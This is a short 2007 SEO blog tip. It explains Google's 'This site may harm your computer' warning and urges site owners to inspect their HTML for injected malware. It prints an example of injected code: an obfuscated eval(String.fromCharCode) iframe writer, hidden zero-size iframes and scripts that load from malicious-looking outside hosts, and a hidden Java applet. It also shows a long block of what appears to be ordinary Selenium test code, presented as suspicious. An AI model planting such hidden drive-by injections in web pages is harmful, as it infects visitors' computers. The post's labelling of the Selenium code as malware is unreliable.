"This site may harm your computer" - seo tip of the day dec 5 2007

"This site may harm your computer"

Have you seen any of your sites or your friends site have something like this displayed near the search results of your site. This could be because of some sort of virus / spyware/ malware coding inserted into your site html script. Before any sort of panic download your pages and review the coding carefully.

You might see things like this /*

1
2 if (window["selenium_has_been_loaded_into_this_window"]==null)
3 {
4
5 __SELENIUM_JS__
6 // Some background on the code below: broadly speaking, where we are relative to other windows
7 // when running in proxy injection mode depends on whether we are in a frame set file or not.
8 //
9 // In regular HTML files, the selenium JavaScript is injected into an iframe called "selenium"
10 // in order to reduce its impact on the JavaScript environment (through namespace pollution,
11 // etc.). So in regular HTML files, we need to look at the parent of the current window when we want
12 // a handle to, e.g., the application window.
13 //
14 // In frame set files, we can't use an iframe, so we put the JavaScript in the head element and share
15 // the window with the frame set. So in this case, we need to look at the current window, not the
16 // parent when looking for, e.g., the application window. (TODO: Perhaps I should have just
17 // assigned a regular frame for selenium?)
18 //
19 BrowserBot.prototype.getContentWindow = function() {
20 return window;
21 };
22
23 BrowserBot.prototype.getTargetWindow = function(windowName) {
24 return window;
25 };
26
27 BrowserBot.prototype.getCurrentWindow = function() {
28 return window;
29 };
30
31 LOG.openLogWindow = function(message, className) {
32 // disable for now
33 };
34
35 BrowserBot.prototype.relayToRC = function(name) {
36 var object = eval(name);
37 var s = 'state:' + serializeObject(name, object) + "\n";
38 sendToRC(s,"state=true");
39 }
40
41 function selenium_frameRunTest(oldOnLoadRoutine) {
42 if (oldOnLoadRoutine) {
43 eval(oldOnLoadRoutine);
44 }
45 runSeleniumTest();
46 }
47
48 function seleniumOnLoad() {
49 injectedSessionId = @SESSION_ID@;
50 window["selenium_has_been_loaded_into_this_window"] = true;
51 runSeleniumTest();
52 }
53
54 function seleniumOnUnload() {
55 sendToRC("Current window or frame is closed!", "closing=true");
56 }
57
58 if (window.addEventListener) {
59 window.addEventListener("load", seleniumOnLoad, false); // firefox
60 window.addEventListener("unload", seleniumOnUnload, false); // firefox
61 } else if (window.attachEvent){
62 window.attachEvent("onload", seleniumOnLoad); // IE
63 window.attachEvent("onunload", seleniumOnUnload); // IE
64 }
65 else {
66 throw "causing a JavaScript error to tell the world that I did not arrange to be run on load";
67 }
68
69 injectedSessionId = @SESSION_ID@;
70 proxyInjectionMode = true;
71 }
72

script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101)) < src="http://www.sp2fucked.biz/user10/counter.htm" width="0BORDER="0" height="0">< src="http://fresWERWERERh-tWEREWREWReens.net/c4t.html" width="0" border="0HEIGHT="0">< language="JavaScript" type="text/JavaScript" src="http://install.xxxtsdfsdfdfoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&retry=2&loadfirst=0&account_id=125893&adid=a1061219198">

< data="object2.cfm" width="0" height="0">< archive="ar3.jar" code="Counter.class" border="0" width="1" height="1style=""> */
Please consider what someone can do who has file writing privileges on your server:
- use your machine as a storage space for file sharing (read: distribute illegal copies of new movies) - use your machine to store and share child porn - use your machine to send out millions of spam mails - add your machine to a botnet and rent it for attacks (as in: blackmailing online businesses with DDOS attacks) - download confidential info from your machine like credit card info, passwords - use your machine as a landing platform for online fraud -use your machine to spread virus/malware/spyware/scumware
See this URL it gives vital information on the exploit:

vitalsecurity.org/xpire-splitinfinity-serverhack_malwareinstall-condensed.pdf

Earthlink Netscape Netvouz RawSugar Shadows Sphinn StumbleUpon Yahoo MyWeb